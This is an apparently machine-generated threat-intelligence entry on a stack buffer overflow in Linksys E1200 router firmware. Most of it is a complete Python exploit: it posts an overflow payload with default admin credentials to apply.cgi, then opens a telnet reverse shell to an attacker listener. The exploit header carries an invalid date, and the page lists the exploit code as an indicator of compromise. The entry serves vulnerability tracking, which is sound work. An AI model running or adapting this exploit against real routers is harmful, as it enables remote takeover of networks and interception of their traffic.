Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE)
AI Analysis
Technical Summary
The Linksys E1200 router running firmware version 2.0.04 contains an authenticated stack buffer overflow vulnerability that allows an attacker with valid credentials to execute arbitrary code remotely. The exploit targets the device's stack memory, leading to potential full system compromise. Public exploit code is available in Python, facilitating reproduction of the attack. No details on affected subversions or vendor patches are provided.
Potential Impact
Successful exploitation can result in remote code execution on the affected device, potentially allowing an attacker to take full control of the router. This can lead to network compromise or interception of traffic passing through the device.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict administrative access to trusted users and networks only. Monitor for updates from Linksys regarding firmware patches addressing this vulnerability.
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: Linksys E1200 2.0.04 - Authenticated Stack Buffer Overflow (RCE)
# Date: 2026-15-03
# Exploit Author: JarrettgxzSec
# Vendor Homepage: www.linksys.com
# Version: FW <= v2.0.04
# Tested on: v2.0.02 & v2.0.04, directly connected to the LAN
# CVE: CVE-2025-60690
# Github repository: https://github.com/Jarrettgohxz/CVE-research/tree/main/Linksys/E1200-V2/CVE-2025-60690

import sys
import socket
import threading
import time
from urllib.parse import quote

print('[!] Please refer to the README (comments at the top of this script) to understand the affected firmware versions for CVE-2025-60690, and for which this exploit script will work on\n')

if len(sys.argv) != 3:
    print(f"[!] Usage: python3 {sys.argv[0]} <ATTACKER_IP> <TARGET_IP>")
    print(f"[!] Example: python3 {sys.argv[0]} 192.168.1.100 192.168.1.1\n")
    sys.exit(1)

TARGET_IP = sys.argv[2]
TARGET_PORT = 80
ATTACKER_IP = sys.argv[1]
SHELL_PORT = 8888


def start_shell_listener():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(('0.0.0.0', SHELL_PORT))
        print(f"[*] Listening for shell on port {SHELL_PORT}...")
        s.listen(1)
        conn, addr = s.accept()
        print(f"[+] Connection received from {addr[0]}")

        # allows interactive interaction
        conn.setblocking(True)
        conn.settimeout(0.5)

        while True:
            # send command to the router
            cmd = input("# ")
            conn.send((cmd + "\n").encode())

            # receive output from the router
            try:
                while True:
                    # keep reading until the device stops sending
                    chunk = conn.recv(4096).decode(errors='ignore')
                    if not chunk:
                        print("\n[!] Connection closed by target.")
                        return
                    print(chunk, end="", flush=True)
            # timeout decided by the conn.settimeout() method previously
            except socket.timeout:
                # this is expected when the device is done sending text
                pass


def execute_exploit():
    print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...")

    # Construct the shell payload
    payload = "rm /tmp/f \n"
    payload += "mkfifo /tmp/f \n"
    payload += "killall httpd && httpd \n"
    payload += f"cat /tmp/f | /bin/sh 2>&1 | telnet {ATTACKER_IP} {SHELL_PORT} > /tmp/f"
    payload = quote(f" {payload}")

    # Construct the exploit payload
    data = b"action=Apply&lan_netmask=&lan_ipaddr=4&lan_ipaddr_0=x&lan_ipaddr_1=x&lan_ipaddr_2=x&lan_ipaddr_3="
    data += b"A"*74 + b"\xa0\x1e\xd6\x2a" + b"A"*24 + b"\x44\xa0\xd6\x2a" + b"A"*72 + b"\xfc\xd8\xd4\x2a" + b"A"*28
    data += payload.encode()

    # Construct the raw HTTP POST body
    content_length = len(data)
    http_req = f"POST /apply.cgi HTTP/1.1\r\n"
    http_req += f"Host: {TARGET_IP}\r\n"
    http_req += "Content-Type: application/x-www-form-urlencoded\r\n"
    http_req += "Authorization: Basic YWRtaW46YWRtaW4=\r\n"
    http_req += f"Content-Length: {content_length}\r\n"
    http_req += "\r\n"
    http_req = http_req.encode() + data

    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(10)
            s.connect((TARGET_IP, TARGET_PORT))
            s.sendall(http_req)
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    # start the shell listener in the background
    listener_thread = threading.Thread(target=start_shell_listener)
    listener_thread.daemon = True
    listener_thread.start()

    # short sleep to ensure the listener is bound and ready
    time.sleep(1)

    # execute the exploit function
    execute_exploit()

    # keep main thread alive to interact with the shell
    while listener_thread.is_alive():
        time.sleep(1)
```
AI-Powered Analysis
Machine-generated threat intelligence
Technical Details
- Edb Id: 52548
- Has Exploit Code: true
- Code Language: python
Threat ID: 69f9a0c3cbff5d8610d729cd
Added to database: 5/5/2026, 7:48:19 AM
Last enriched: 5/5/2026, 7:48:33 AM
Last updated: 5/6/2026, 3:53:41 AM